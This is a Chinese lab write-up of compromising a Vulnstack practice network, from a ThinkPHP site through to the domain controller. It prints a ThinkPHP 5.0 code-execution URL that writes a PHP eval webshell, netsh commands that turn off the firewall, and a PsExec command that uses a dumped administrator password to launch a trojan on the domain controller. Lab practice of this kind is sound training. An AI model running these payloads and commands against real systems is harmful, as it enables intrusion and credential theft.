1.环境搭建
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/
win7(双网卡):
192.168.135.150(外网)
192.168.138.136(内网)
外网使用NAT模式,内网仅主机模式。
win2008:
2.外网信息收集
2.1访问目标网站发现是个TP框架的站。
2.2版本判断
通过报错得知TP的详细版本
2.3进行目录扫描
拿服务器权限
1.当我们确认框架和具体版本后,就可以寻找框架对应的历史漏洞poc。
ThinkPhp5.0任意代码执行:https://www.cnblogs.com/backlion/p/10106676.html
2.尝试写入shell
http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"]);?^>>shell.php
成功的话会写入到public目录下,然后访问一下shell.php就拿蚁剑连接。
然后就进入到我们的内网了
3.内网信息收集
1.查看一下权限
如果权限较低的话就要提权,可以systeminfo查看补丁信息然后寻找对应的EXP进行提权。
3.1存活主机
4横向渗透
4.1先打开Cobalt Strike然后让win7上线
4.2minikatz尝试读取密码
4.3找域控制器
内网扫描存活主机
ipconfig -all 发现DNS后缀为sun.com这一般是域控制器的域名
ping一下得到ip
就可以确定192.168.138.138的主机就是域控制器了
5拿域控
5.1提权
先把win7的administrator权限提升为system,这里使用烂土豆,成功提权SYStem
5.2psexec传递
因为域控是不与外网进行接触的,所以要先在已经上线的主机上建立一个listen
然后生成一个Executable(S)木马,上传到win7上
因为自带的psexec只可以在目标可以访问外网的情况下使用所以这我们还要自己上传一个psexec.exe
因为win7的防火墙缘故,7777端口是进不去的可以,关闭防火墙:NetSh Advfirewall set allprofiles state off ,或者添加规则来放行7777端口
netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=7777
最后使用上传的psexec加上抓取的明文密码配合exe成功上线域控。
Shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p WW123123ww. -d -c C:\phpStudy\PHPTutorial\WWW\public\nei.exe
(psexec的用法)[https://blog.csdn.net/jamesdodo/article/details/81743224]
总结:
先说遇到的坑:system的权限读取密码和执行psexec老报错,administrator就很顺利,不晓得是靶机的问题还是我自己搭建的环境有问题。
充环境搭建到域控上线用了两天太菜了,不过好在学到了一些东西,加油!!
来源:oschina
链接:https://my.oschina.net/u/4267539/blog/4428805